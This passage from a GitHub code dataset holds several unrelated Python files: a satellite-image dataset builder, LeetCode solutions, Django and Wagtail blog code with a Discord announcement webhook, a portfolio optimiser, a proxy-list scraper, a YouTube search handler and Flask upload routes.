data_o=tf.reshape(data_o,[size_tot[1]*size_tot[2],width,width,data.shape[3]])\n \n Data_o= sess.run(data_o,feed_dict={data_pl: data})\n print('%d patches of size %d x %d created as list'%(Data_o.shape[0],Data_o.shape[1],Data_o.shape[2]))\n return Data_o\n \npath_raw='../SPACENET_DATA/SPACENET_DATA_PROCESSED/RAW_IMAGES/'\n\npath_dataset='../SPACENET_DATA/SPACENET_DATA_PROCESSED/DATASET/128_x_128_8_bands_pansh/'\nif not os.path.exists(path_dataset):\n os.makedirs(path_dataset)\n\ntraining_ratio=0.8 #so test_ratio=0.2\nvalidation_ratio=0.2\n\npath_panchro=[]\npath_pansharp=[]\npath_groundtruth=[]\n\nfor citydir in sorted(os.listdir(path_raw)):\n if citydir.startswith('AOI_1_RIO'):\n continue\n else:\n for bandsdir in sorted(os.listdir(os.path.join(path_raw,citydir))):\n if bandsdir.startswith('PANCHRO'):\n for filename in sorted(os.listdir(os.path.join(path_raw,citydir,bandsdir))):\n path_panchro.append(os.path.join(path_raw,citydir,bandsdir,filename))\n if bandsdir.startswith('PANSHARP'):\n for filename in sorted(os.listdir(os.path.join(path_raw,citydir,bandsdir))):\n path_pansharp.append(os.path.join(path_raw,citydir,bandsdir,filename))\n if bandsdir.startswith('GROUNDTRUTH'):\n for filename in sorted(os.listdir(os.path.join(path_raw,citydir,bandsdir))):\n path_groundtruth.append(os.path.join(path_raw,citydir,bandsdir,filename))\n \n \nprint('Do the splitting for ORIGINAL SIZE of patches\\n') \npath_panchro=np.asarray(path_panchro)\nprint('Length List panchro %d'%path_panchro.shape)\npath_pansharp=np.asarray(path_pansharp)\nprint('Length List pansharp %d'%path_panchro.shape)\npath_groundtruth=np.asarray(path_groundtruth)\nprint('Length List groundtruth %d'%path_panchro.shape)\n\n\nidx_shuffle = np.arange(len(path_panchro))\nnp.random.shuffle(idx_shuffle)\n\n\npath_panchro=path_panchro[idx_shuffle]\npath_pansharp=path_pansharp[idx_shuffle]\npath_groundtruth=path_groundtruth[idx_shuffle]\n\n\n#Do the split\ntraining_size=int(round(training_ratio*path_panchro.shape[0]))\ntest_size=path_panchro.shape[0]-training_size\nvalidation_size=int(round(validation_ratio*training_size))\ntraining_size=training_size-validation_size\n\nprint('Split (TRAINING - VALIDATION:%f) - TEST:%f done'%(1-validation_ratio,training_ratio))\nprint('Training size:%d, Validation size:%d, Test size: %d'%(training_size,validation_size,test_size))\n\n\nif not os.path.exists(path_dataset+'TRAINING'):\n os.makedirs(path_dataset+'TRAINING')\n if not os.path.exists(path_dataset+'TRAINING/INPUT'):\n os.makedirs(path_dataset+'TRAINING/INPUT')\n if not os.path.exists(path_dataset+'TRAINING/OUTPUT'):\n os.makedirs(path_dataset+'TRAINING/OUTPUT')\nif not os.path.exists(path_dataset+'VALIDATION'):\n os.makedirs(path_dataset+'VALIDATION')\n if not os.path.exists(path_dataset+'VALIDATION/INPUT'):\n os.makedirs(path_dataset+'VALIDATION/INPUT')\n if not os.path.exists(path_dataset+'VALIDATION/OUTPUT'):\n os.makedirs(path_dataset+'VALIDATION/OUTPUT')\nif not os.path.exists(path_dataset+'TEST'):\n os.makedirs(path_dataset+'TEST')\n if not os.path.exists(path_dataset+'TEST/INPUT'):\n os.makedirs(path_dataset+'TEST/INPUT')\n if not os.path.exists(path_dataset+'TEST/OUTPUT'):\n os.makedirs(path_dataset+'TEST/OUTPUT')\nwith tf.Session() as sess:\n count_tr=0 \n print('BUILD TRAINING SET')\n for i in range(training_size):\n filename=path_pansharp[i].split('pansharp_')[1]\n filename=filename.split('.h5')[0]\n\n panchro=read_data_h5(path_panchro[i])\n pansharp=read_data_h5(path_pansharp[i])\n groundtruth=read_data_h5(path_groundtruth[i])\n 
input_=np.concatenate((panchro,pansharp),axis=3)\n output_=groundtruth\n\n input_=extract_patches(sess,input_,WIDTH,STRIDE)\n output_=extract_patches(sess,output_,WIDTH,STRIDE)\n\n for j in range(input_.shape[0]):\n write_data_h5(path_dataset+'TRAINING/INPUT/input_'+filename+'_'+str(j)+'.h5',input_[j,:,:,:])\n write_data_h5(path_dataset+'TRAINING/OUTPUT/output_'+filename+'_'+str(j)+'.h5',output_[j,:,:,0])\n count_tr+=1\n\n\n print('BUILD VALIDATION SET')\n count_val=0\n for i in range(training_size,training_size+validation_size):\n filename=path_pansharp[i].split('pansharp_')[1]\n filename=filename.split('.h5')[0]\n\n panchro=read_data_h5(path_panchro[i])\n pansharp=read_data_h5(path_pansharp[i])\n groundtruth=read_data_h5(path_groundtruth[i])\n input_=np.concatenate((panchro,pansharp),axis=3)\n output_=groundtruth\n\n input_=extract_patches(sess,input_,WIDTH,STRIDE)\n output_=extract_patches(sess,output_,WIDTH,STRIDE)\n\n for j in range(input_.shape[0]):\n write_data_h5(path_dataset+'VALIDATION/INPUT/input_'+filename+'_'+str(j)+'.h5',input_[j,:,:,:])\n write_data_h5(path_dataset+'VALIDATION/OUTPUT/output_'+filename+'_'+str(j)+'.h5',output_[j,:,:,0])\n count_val+=1\n\n count_test=0\n\n print('BUILD TEST SET')\n for i in range(training_size+validation_size,path_panchro.shape[0]):\n filename=path_pansharp[i].split('pansharp_')[1]\n filename=filename.split('.h5')[0]\n\n panchro=read_data_h5(path_panchro[i])\n pansharp=read_data_h5(path_pansharp[i])\n groundtruth=read_data_h5(path_groundtruth[i])\n input_=np.concatenate((panchro,pansharp),axis=3)\n output_=groundtruth\n\n input_=extract_patches(sess,input_,WIDTH,STRIDE)\n output_=extract_patches(sess,output_,WIDTH,STRIDE)\n for j in range(input_.shape[0]):\n write_data_h5(path_dataset+'TEST/INPUT/input_'+filename+'_'+str(j)+'.h5',input_[j,:,:,:])\n write_data_h5(path_dataset+'TEST/OUTPUT/output_'+filename+'_'+str(j)+'.h5',output_[j,:,:,0])\n count_test+=1\n \nprint('Elements in Training set %d'%count_tr) \nprint('Elements in Validation set %d'%count_val) \nprint('Elements in Test set %d'%count_test) ","repo_name":"melissande/dhi-segmentation-buildings","sub_path":"Data_Handle/build_dataset_spacenet.py","file_name":"build_dataset_spacenet.py","file_ext":"py","file_size_in_byte":6885,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"40"} +{"seq_id":"10786755595","text":"# Time: O(n)\n# Space: O(1)\n\nclass Solution(object):\n def fizzBuzz(self, n):\n \"\"\"\n :type n: int\n :rtype: List[str]\n \"\"\"\n result = []\n\n for i in xrange(1, n+1):\n if i % 15 == 0:\n result.append(\"FizzBuzz\")\n elif i % 5 == 0:\n result.append(\"Buzz\")\n elif i % 3 == 0:\n result.append(\"Fizz\")\n else:\n result.append(str(i))\n\n return result\n\n def fizzBuzz2(self, n):\n \"\"\"\n :type n: int\n :rtype: List[str]\n \"\"\"\n l = [str(x) for x in range(n + 1)]\n l3 = range(0, n + 1, 3)\n l5 = range(0, n + 1, 5)\n for i in l3:\n l[i] = 'Fizz'\n for i in l5:\n if l[i] == 'Fizz':\n l[i] += 'Buzz'\n else:\n l[i] = 'Buzz'\n return l[1:]\n\n def fizzBuzz3(self, n):\n return ['Fizz' * (not i % 3) + 'Buzz' * (not i % 5) or str(i) for i in range(1, n + 1)]\n\n def fizzBuzz4(self, n):\n return ['FizzBuzz'[i % -3 & -4:i % -5 & 8 ^ 12] or repr(i) for i in range(1, n + 1)]\n\n","repo_name":"kamyu104/LeetCode-Solutions","sub_path":"Python/fizz-buzz.py","file_name":"fizz-buzz.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","stars":4314,"dataset":"github-code","pt":"40"} 
+{"seq_id":"34691959920","text":"from django.contrib.auth.models import User\nfrom django.core.management.base import BaseCommand\n\nfrom blog.models import Category, Article\n\n\nclass Command(BaseCommand):\n help = 'Populates the database with some testing data.'\n\n def handle(self, *args, **options):\n self.stdout.write(self.style.SUCCESS('Started database population process...'))\n\n if User.objects.filter(username=\"ali44\").exists():\n self.stdout.write(self.style.SUCCESS('Database has already been populated. Cancelling the operation.'))\n return\n\n # Create users\n ali = User.objects.create_user(username='ali44', password='really_strong_password123')\n ali.first_name = 'Ali'\n ali.last_name = 'Veli'\n ali.save()\n\n adnan = User.objects.create_user(username='adnan_', password='really_strong_password123')\n adnan.first_name = 'Adnan'\n adnan.last_name = 'Kaya'\n adnan.save()\n\n kaya = User.objects.create_user(username='kaya', password='really_strong_password123')\n kaya.first_name = 'Kaya'\n kaya.last_name = 'Ce'\n kaya.save()\n\n # Create categories\n system_administration = Category.objects.create(name='System administration')\n seo_optimization = Category.objects.create(name='SEO optimization')\n programming = Category.objects.create(name='Programming')\n\n # Create articles\n website_article = Article.objects.create(\n title='How to code and deploy a website?',\n author=ali,\n type='TU',\n content='There are numerous ways of how you can deploy a website...',\n )\n website_article.save()\n website_article.categories.add(programming, system_administration, seo_optimization)\n\n google_article = Article.objects.create(\n title='How to improve your Google rating?',\n author=adnan,\n type='TU',\n content='Firstly, add the correct SEO tags...',\n )\n google_article.save()\n google_article.categories.add(seo_optimization)\n\n programming_article = Article.objects.create(\n title='Which programming language is the best?',\n author=adnan,\n type='RS',\n content='The best programming languages are:\\n1) Python\\n2) Java\\n3) C/C++...',\n )\n programming_article.save()\n programming_article.categories.add(programming)\n\n ubuntu_article = Article.objects.create(\n title='Installing the latest version of Ubuntu',\n author=kaya,\n type='TU',\n content=\"In this tutorial, we'll take a look at how to setup the latest version of Ubuntu. Ubuntu \"\n \"(/ʊˈbʊntuː/ is a Linux distribution based on Debian and composed mostly of free and open-source\"\n \" software. Ubuntu is officially released in three editions: Desktop, Server, and Core for \"\n \"Internet of things devices and robots.\",\n )\n ubuntu_article.save()\n ubuntu_article.categories.add(system_administration)\n\n django_article = Article.objects.create(\n title='Django REST Framework and Elasticsearch',\n author=kaya,\n type='TU',\n content=\"In this tutorial, we'll look at how to integrate Django REST Framework with Elasticsearch. \"\n \"We'll use Django to model our data and DRF to serialize and serve it. 
Finally, we'll index the data \"\n \"with Elasticsearch and make it searchable.\",\n )\n django_article.save()\n django_article.categories.add(system_administration)\n\n self.stdout.write(self.style.SUCCESS('Successfully populated the database.'))","repo_name":"adnankaya/drf-elastic","sub_path":"blog/management/commands/populate_db.py","file_name":"populate_db.py","file_ext":"py","file_size_in_byte":3718,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"3270718061","text":"class Node:\n def __init__(self, start, end, double_booked):\n self.start = start\n self.end = end\n self.double_booked = double_booked\n self.left = None\n self.right = None\n\n def _check(self, node):\n if node.end <= self.start:\n if self.left:\n return self.left._check(node)\n return True\n if self.end <= node.start:\n if self.right:\n return self.right._check(node)\n return True\n if self.double_booked:\n return False\n checked = True\n if self.start != node.start:\n left_start = min(self.start, node.start)\n left_end = max(self.start, node.start)\n left_node = Node(left_start, left_end, False)\n if self.left: \n checked &= self.left._check(left_node)\n if self.end != node.end:\n right_start = min(self.end, node.end)\n right_end = max(self.end, node.end)\n right_node = Node(right_start, right_end, False)\n if self.right:\n checked &= self.right._check(right_node)\n return checked\n\n\n def insert(self, node):\n if self._check(node):\n self._insert(node)\n return True\n return False\n\n def _insert(self, node):\n if node.end <= self.start:\n if self.left:\n self.left.insert(node)\n else:\n self.left = node\n elif self.end <= node.start:\n if self.right:\n self.right.insert(node)\n else:\n self.right = node\n else:\n if self.start != node.start:\n left_start = min(self.start, node.start)\n left_end = max(self.start, node.start)\n left_node = Node(left_start, left_end, False)\n if self.left:\n self.left.insert(left_node)\n else:\n self.left = left_node\n if self.end != node.end:\n right_start = min(self.end, node.end)\n right_end = max(self.end, node.end)\n right_node = Node(right_start, right_end, False)\n if self.right:\n self.right.insert(right_node)\n else:\n self.right = right_node\n self.start = max(self.start, node.start)\n self.end = min(self.end, node.end)\n self.double_booked = True\n\n\nclass MyCalendarTwo:\n\n def __init__(self):\n self.root = None\n\n def book(self, start: int, end: int) -> bool:\n node = Node(start, end, False)\n if not self.root:\n self.root = node\n return True\n return self.root.insert(node)\n\n\n# Your MyCalendarTwo object will be instantiated and called as such:\n# obj = MyCalendarTwo()\n# param_1 = obj.book(start,end)\n","repo_name":"bolatov/leetcode","sub_path":"0731_my-calendar-ii.py","file_name":"0731_my-calendar-ii.py","file_ext":"py","file_size_in_byte":2903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"6388481854","text":"from django.db import models\nfrom django.conf import settings\nfrom wagtail.core.models import Page\nfrom wagtail.core.fields import StreamField\nfrom wagtail.core import blocks\nfrom wagtail.images.blocks import ImageChooserBlock\nfrom wagtail.documents.blocks import DocumentChooserBlock\nfrom wagtail.admin.edit_handlers import StreamFieldPanel, FieldPanel\nfrom wagtail.images.edit_handlers import ImageChooserPanel\nfrom wagtail.embeds.blocks import EmbedBlock\nfrom wagtail.core.fields import RichTextField\nfrom wagtail.core.signals 
import page_published\nfrom mainapp.blocks import TwoColumnBlock, HeadingBlock\nfrom discord import Webhook, RequestsWebhookAdapter, Embed\nfrom datetime import datetime, timedelta\nimport locale\nimport os\n\nif os.name == 'nt':\n locale.setlocale(locale.LC_TIME, \"fr-FR\")\nelse:\n locale.setlocale(locale.LC_TIME, \"fr_FR\")\n\n# Create your models here.\nclass ArticlePage(Page):\n \"\"\"ArticlePage model using to represent any Article on the site\"\"\"\n feed_image = models.ForeignKey(\n 'wagtailimages.Image',\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n related_name='+'\n )\n description = models.CharField(max_length=255)\n body = StreamField([\n ('heading', HeadingBlock(classname=\"full title\")),\n ('paragraph', blocks.RichTextBlock()),\n ('image', ImageChooserBlock()),\n ('two_columns', TwoColumnBlock()),\n ('embedded_video', EmbedBlock(icon=\"media\")),\n ('document', DocumentChooserBlock()),\n ('raw_html', blocks.RawHTMLBlock()),\n ],null=True,blank=True)\n\n content_panels = Page.content_panels + [\n FieldPanel('description'),\n StreamFieldPanel('body'),\n ]\n\n promote_panels = [\n ImageChooserPanel('feed_image'),\n ]\n\n @property\n def article_page(self):\n return self.get_parent().specific\n\n def get_context(self, request, *args, **kwargs):\n context = super(ArticlePage, self).get_context(request, *args, **kwargs)\n context['article_page'] = self.article_page\n return context\n\nclass GuidePage(Page):\n \"\"\"GuidePage model using to represent any Guide on the site\"\"\"\n feed_image = models.ForeignKey(\n 'wagtailimages.Image',\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n related_name='+'\n )\n description = models.CharField(max_length=255)\n body = StreamField([\n ('heading', HeadingBlock(classname=\"full title\")),\n ('paragraph', blocks.RichTextBlock()),\n ('image', ImageChooserBlock()),\n ('two_columns', TwoColumnBlock()),\n ('embedded_video', EmbedBlock(icon=\"media\")),\n ('document', DocumentChooserBlock()),\n ('raw_html', blocks.RawHTMLBlock()),\n ],null=True,blank=True)\n\n content_panels = Page.content_panels + [\n FieldPanel('description'),\n StreamFieldPanel('body'),\n ]\n\n promote_panels = [\n ImageChooserPanel('feed_image'),\n ]\n\n @property\n def guide_page(self):\n return self.get_parent().specific\n\n def get_context(self, request, *args, **kwargs):\n context = super(GuidePage, self).get_context(request, *args, **kwargs)\n context['guide_page'] = self.guide_page\n return context\n\nclass AnswerPage(Page):\n \"\"\"AnswerPage model using to represent any Answer in FAQ page on the site\"\"\"\n body = RichTextField()\n\n content_panels = Page.content_panels + [\n FieldPanel('body'),\n ]\n\n @property\n def answer_page(self):\n return self.get_parent().specific\n\n def get_context(self, request, *args, **kwargs):\n context = super(AnswerPage, self).get_context(request, *args, **kwargs)\n context['answer_page'] = self.answer_page\n return context\n\nclass HomePage(Page):\n \"\"\"HomePage model using as root directory for the other pages directory\"\"\"\n subpage_types = ['ArticlesPage', 'GuidesPage', 'FAQPage']\n\nclass ArticlesPage(Page):\n \"\"\"ArticlesPage model using ArticlePage directory\"\"\"\n subpage_types = ['ArticlePage']\n\nclass GuidesPage(Page):\n \"\"\"GuidesPage model using GuidePage directory\"\"\"\n subpage_types = ['GuidePage']\n\nclass FAQPage(Page):\n \"\"\"FAQPage model using AnswerPage directory\"\"\"\n subpage_types = ['AnswerPage']\n\ndef send_to_discord(sender, **kwargs):\n # Let everyone know when a new page 
is published using Discord Webhook\n if settings.DEBUG or settings.TESTING:\n return\n \n page = kwargs['instance']\n\n # First published check\n if page.first_published_at != page.last_published_at:\n return\n if page.get_parent().title not in ['Articles']:\n return\n\n webhook = Webhook.partial(settings.DISCORD_WEBHOOK_ID, settings.DISCORD_WEBHOOK_TOKEN, adapter=RequestsWebhookAdapter())\n embed = Embed(type=\"rich\", description='{}'.format(page.description), colour=0x90E050)\n embed.set_author(name=page.title, url='https://{}{}'.format(settings.SITE_NAME, page.url), icon_url=\"https://i.imgur.com/9UsXLG0.png\")\n if page.articlepage.feed_image:\n embed.set_thumbnail(url='https://{}{}'.format(settings.SITE_NAME, page.articlepage.feed_image.get_rendition('fill-800x600').url))\n embed.set_footer(text='{} | {}'.format(page.owner.username, (page.first_published_at).strftime('%A %d %B - %H:%M').title()))\n webhook.send(username='Fortnite STW FR', embed=embed)\n\n# Register a receiver\npage_published.connect(send_to_discord)","repo_name":"Hideky/Fortnite-STW","sub_path":"mainapp/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"1628370836","text":"\nimport yfinance as yf\nimport numpy as np\nfrom scipy.optimize import minimize\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n#Get the stock data from yfinance\n#stock_tickers = ['AAPL', 'MSFT', 'GOOG', 'AMZN', 'META', 'BABA', 'BRK-B', 'TCEHY', 'JPM', 'V'] #2019Q4\nstock_tickers = ['AAPL', 'MSFT', 'GOOG', 'AMZN', 'TSLA', 'META', 'NVDA', 'BRK-B', 'TSM', 'TCEHY']#2021Q4\n\nstart_date = '2021-01-01'\nmid_date = '2021-12-31'\nend_date = '2022-12-31'\n#stock_data = yf.download(stock_tickers, start=start_date, end=end_date)['Adj Close']\nstock_data = pd.read_csv('stock_data2021-2022.csv', index_col=0)\n#%%\n\nind_returns = pd.DataFrame(np.log(stock_data.loc[start_date: mid_date] / stock_data.loc[start_date: mid_date].shift(1)))\n#ind_returns = (ind_returns - ind_returns.mean()) / ind_returns.std()\n\nind_returns.plot(figsize=(15,12), subplots=True, layout=(4,3))\nind_returns.hist(figsize=(15,12), bins=50)\n\n#Calaulte returns/risk \nret_std = ind_returns.mean()*252 / (ind_returns.std()*(252**0.5))\n\n#%%\n#Calculate the returns and covariance matrix\nreturns = ind_returns.mean() * 252\ncov_matrix = ind_returns.cov()*252\n\nprint('returns: ', returns)\nprint('covariance matrix: ', cov_matrix)\n\n\n#%%\ndef portfolio_objective(weights, returns, cov_matrix, risk_aversion=0.5):\n portfolio_return = np.sum(weights * returns)\n portfolio_variance = np.dot(weights.T, np.dot(cov_matrix, weights))\n #objective = portfolio_return - risk_aversion * portfolio_variance\n objective = portfolio_return / (portfolio_variance**0.5)\n return -objective\n\ndef maximize_mean_variance_utility(returns, cov_matrix, risk_aversion=0.5):\n num_assets = returns.shape[0]\n initial_weights = np.ones(num_assets) / num_assets\n constraints = ({'type': 'eq', 'fun': lambda x: 1-np.sum(x)})\n bounds = [(0, 1) for i in range(num_assets)]\n result = minimize(portfolio_objective, initial_weights, args=(returns, cov_matrix, risk_aversion),\n method='SLSQP', constraints=constraints, bounds=bounds)\n #min method: 'L-BFGS-B' 'trust-constr' 'SLSQP' 'Newton-CG’\n return result.x\n\nrisk_aversion = 0.5\nMVO_weights = maximize_mean_variance_utility(returns, cov_matrix, risk_aversion)\n\n\n#%%\n# Get the price data of SPY and the 
portfolio\n\nbenchmark_data = yf.download('SPY', start=mid_date, end=end_date)['Adj Close']\n#portfolio_data = (stock_data[stock_tickers].loc[mid_date:end_date] @ MVO_weights).to_frame()\nportfolio_data = (stock_data.loc[mid_date:end_date] @ MVO_weights).to_frame()\new_portfolio = (stock_data.loc[mid_date:end_date] @ (np.ones(len(stock_tickers))/len(stock_tickers))).to_frame()\n\n#%%\n# Calculate the daily returns\nbenchmark_returns = pd.DataFrame(np.log(benchmark_data / benchmark_data.shift(1)))\nportfolio_returns = pd.DataFrame(np.log(portfolio_data / portfolio_data.shift(1)))\new_returns = pd.DataFrame(np.log(ew_portfolio / ew_portfolio.shift(1)))\n\n#calculate sharpe ratio\nbenchmark_sharpe = benchmark_returns.mean()*252 / (benchmark_returns.std()*(252**0.5))\nportfolio_sharpe = portfolio_returns.mean()*252 / (portfolio_returns.std()*(252**0.5))\new_sharpe = ew_returns.mean()*252 / (ew_returns.std()*(252**0.5))\n \n#calculate cumulative returns \ncum_benchmark = (benchmark_returns+1).cumprod()\ncum_benchmark.columns=['SPY']\ncum_portfolio = (portfolio_returns+1).cumprod()\ncum_portfolio.columns=['MVO portfolio']\ncum_ew = (ew_returns+1).cumprod()\ncum_ew.columns=['Equally weighted']\n\ndf = pd.concat([cum_benchmark, cum_portfolio, cum_ew], axis=1)\n# Plot the cumulative returns\ncum_return_plot = df.plot(figsize=(15,12), title='Cumulative Returns: MVO portfolio v.s. SPY v.s. Equally weighted portfolio\\n'+mid_date+' to '+end_date)\ncum_return_plot.set_ylabel('Cumulative Returns')\n#plt.plot(benchmark_returns, label='Nasdaq 100')\n#plt.plot(portfolio_returns, label='MVO Portfolio')\n#plt.show()\n","repo_name":"litingtang/mean_variance_optimization","sub_path":"MVO.py","file_name":"MVO.py","file_ext":"py","file_size_in_byte":3839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"15920779458","text":"import re\n\n\ndef find_my_pattern(input):\n\t\"\"\" Find a number of the form nn nnn\"\"\"\n\tregex = re.compile(r'(\\d{2}) (\\d{3})')\n\toutput = regex.findall(input)\n\treturn output\n\n\na = find_my_pattern('My first number is 22 333 but a friend of mine has 32 433 as a phone number')\nprint(a)","repo_name":"margolek/python-sorted-by-topics","sub_path":"Regex/match_number.py","file_name":"match_number.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"6260230883","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom ..items import ZtestItem\nimport time\n\n\nclass ExampleSpider(scrapy.Spider):\n    name = 'xici'\n    allowed_domains = ['xicidaili.com']\n    start_urls = ['http://www.xicidaili.com/nn/1']\n\n    def start_requests(self):\n        reqs = []\n\n        for i in range(1, 2):\n            req = scrapy.Request('http://www.xicidaili.com/nn/%s'%i)\n            reqs.append(req)\n\n        return reqs\n\n\n    def parse(self, response):\n        ip_table = response.xpath('//*[@id=\"ip_list\"]/tr')\n        # trs = ip_table.xpath('tr')\n        # print(trs)\n        for tr in ip_table[1:]:\n            item = ZtestItem()\n            item['ip'] = tr.xpath('td[2]/text()')[0].extract()\n            print(item['ip'])\n            item['port'] = tr.xpath('td[3]/text()')[0].extract()\n            print(item['port'])\n            item['address'] = tr.xpath('string(td[4])')[0].extract().strip()\n            print(item['address'])\n            item['httptype'] = tr.xpath('string(td[6])')[0].extract()\n            print(item['httptype'])\n            item['speed'] = tr.xpath('td[7]/div[@class=\"bar\"]/@title')[0].extract()\n            print(item['speed'])\n            item['survival_time'] = tr.xpath('td[9]/text()')[0].extract()\n            
print(item['survival_time'])\n item['check_time'] = tr.xpath('td[10]/text()')[0].extract()\n print(item['check_time'])\n yield item\n","repo_name":"Reluxer/study-notes","sub_path":"python/spider/ztest/ztest/spiders/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":1412,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"30258447089","text":"import asyncio\nimport logging\nfrom collections.abc import Awaitable\nfrom datetime import timedelta\nfrom enum import Enum\nfrom functools import cached_property\nfrom typing import Any, Self, TypedDict\n\nfrom pytube import Search\nfrom yt_dlp import YoutubeDL\n\n\nclass Track:\n def __init__(self, title: str, url: str, thumbnail: str, duration_seconds: int):\n self._title = title\n self._url = url\n self._thumbnail = thumbnail\n self._duration_seconds = duration_seconds\n\n @property\n def title(self) -> str:\n return self._title\n\n @property\n def url(self) -> str:\n return self._url\n\n @property\n def thumbnail(self) -> str:\n return self._thumbnail\n\n @cached_property\n def duration(self) -> timedelta:\n return timedelta(seconds=self._duration_seconds)\n\n\nclass SearchDataType(Enum):\n TRACK = 1\n PLAYLIST = 2\n\n\nclass SearchData(TypedDict):\n type: SearchDataType\n title: str\n thumbnail: str\n length: int\n url: str\n\n\nclass YouTube:\n logger = logging.getLogger(\"handlers.YouTube\")\n yt_dl = YoutubeDL(\n {\n \"format\": \"bestaudio\",\n \"default_search\": \"ytsearch\",\n \"logger\": logger.getChild(\"YoutubeDL\"),\n \"extract_flat\": \"in_playlist\",\n }\n )\n\n @staticmethod\n def _generate_thumbnail_url(video_id: str) -> str:\n return f\"https://i.ytimg.com/vi/{video_id}/maxresdefault.jpg\"\n\n def __init__(self: Self):\n pass\n\n @classmethod\n async def _process_video(cls, info: Any) -> Track:\n return Track(\n title=info[\"title\"],\n url=info[\"url\"],\n thumbnail=cls._generate_thumbnail_url(info[\"id\"]),\n duration_seconds=info[\"duration\"],\n )\n\n @classmethod\n async def _process_playlist_video(cls, url: str) -> Track:\n info = await asyncio.to_thread(cls.yt_dl.extract_info, url=url, download=False)\n\n return await cls._process_video(info)\n\n @classmethod\n async def search_tracks(\n cls, query: str\n ) -> tuple[list[Awaitable[Track]], SearchData]:\n info = await asyncio.to_thread(\n cls.yt_dl.extract_info, url=query, download=False\n )\n\n tracks = (\n [\n asyncio.create_task(cls._process_playlist_video(v[\"url\"]))\n for v in info[\"entries\"]\n ]\n if \"entries\" in info\n else [cls._process_video(info)]\n )\n\n data = {\n \"title\": info[\"entries\"][0][\"title\"]\n if \"entries\" in info and len(info[\"entries\"]) == 1\n else info[\"title\"],\n \"thumbnail\": cls._generate_thumbnail_url(info[\"entries\"][0][\"id\"])\n if \"entries\" in info\n else info[\"thumbnail\"],\n **(\n (\n {\n \"type\": SearchDataType.PLAYLIST,\n \"length\": len(info[\"entries\"]),\n \"url\": info[\"webpage_url\"],\n }\n if len(info[\"entries\"]) > 1\n else {\n \"type\": SearchDataType.TRACK,\n \"length\": info[\"entries\"][0][\"duration\"],\n \"url\": info[\"entries\"][0][\"url\"],\n }\n )\n if \"entries\" in info\n else {\n \"type\": SearchDataType.TRACK,\n \"length\": info[\"duration\"],\n \"url\": info[\"webpage_url\"],\n }\n ),\n }\n\n return tracks, data\n\n @classmethod\n def get_autocompletes(cls, query: str) -> list[str]:\n # TODO: Find a way to use yt-dlp\n\n if query is None or query == \"\":\n return []\n\n # TODO: Clean\n logger = 
cls.logger.getChild(\"get_autocompletes\")\n logger.info(f\"Autocompleting {query}\")\n search = Search(query)\n # suggestions = search.completion_suggestions\n results = map(lambda r: r.title, search.results[:10])\n autocompletes = [*results]\n # autocompletes = [*(results or []), *(suggestions or [])]\n logger.info(f\"Suggestions: {autocompletes}\")\n\n return autocompletes\n","repo_name":"OwenJPage/snorm-bot","sub_path":"lib/handlers/YouTube.py","file_name":"YouTube.py","file_ext":"py","file_size_in_byte":4223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"30200792257","text":"from flask import Blueprint, session, request, jsonify\n\nfrom backend.api import getLinks, cadastroLink\nfrom backend.routes import get_blueprint_name, API_BASE_NAME\nfrom backend.utils.decorators import is_logged_in\nfrom backend.utils.responses import success_response, error_response\n\napi_links_blueprint = Blueprint(get_blueprint_name(API_BASE_NAME, \"links\"), __name__)\n\n\n@api_links_blueprint.route(\"/api/links/\")\n@is_logged_in\ndef apiLinks(id_disciplina):\n data = getLinks(id_disciplina)\n return jsonify(data)\n\n\n@api_links_blueprint.route(\"/api/cadastro/link\", methods=[\"POST\"])\n@is_logged_in\ndef apiCadastroLink():\n r = request.get_json()\n\n id_disciplina = r.get(\"id_disciplina\")\n titulo = r.get(\"titulo\")\n link = r.get(\"link\")\n id_user = session.get(\"id\")\n\n success, message = cadastroLink(id_user, id_disciplina, titulo, link)\n if success:\n return success_response()\n else:\n return error_response(message)\n","repo_name":"vfrezende/Penoso-ou-Mamaozinho-2.0","sub_path":"backend/routes/api/links.py","file_name":"links.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"40"} +{"seq_id":"15836353655","text":"from flask import Flask, render_template,flash,redirect, url_for\nimport os\nimport glob\nfrom flask import send_file\nfrom fileinput import filename\nfrom flask import request\n\nimport myModule\n \napp = Flask(__name__)\napp.secret_key = \"super secret key\"\nupload_path='static/uploaded file/'\nmerge_path='static/merged file/' \n \n# @app.route(\"/\")\n# def index():\n# return render_template(\"layout.html\")\n\n \n@app.route(\"/\")\ndef home():\n return render_template(\"home.html\")\n \n\n\n@app.route('/load-file',methods=['POST'])\ndef load_file():\n if request.method == 'POST':\n res=myModule.clearPath(upload_path) \n if(res!=True):\n return \"Error in clearing uploaded file path\" \n res=myModule.clearPath(merge_path) \n if(res!=True):\n return \"Error in clearing uploaded file path\" \n\n files = request.files.getlist('file[]')\n uploaded_file_names=[]\n extension=['.xlsx']\n\n\n for file in files:\n file_name=file.filename #name\n \n if file_name != '':\n file_extension = myModule.getExtension(file_name)\n\n if file_extension not in extension:\n flash('Invalid Extension','bg-danger')\n return redirect(url_for('home'))\n else:\n try:\n file.save(upload_path+file.filename) #uploaded\n uploaded_file_names.append(file_name)\n except:\n flash('Error in file uploading')\n return redirect(url_for('home'))\n else:\n flash('Invalid File','bg-danger')\n return redirect(url_for('home'))\n \n if(len(uploaded_file_names)):\n 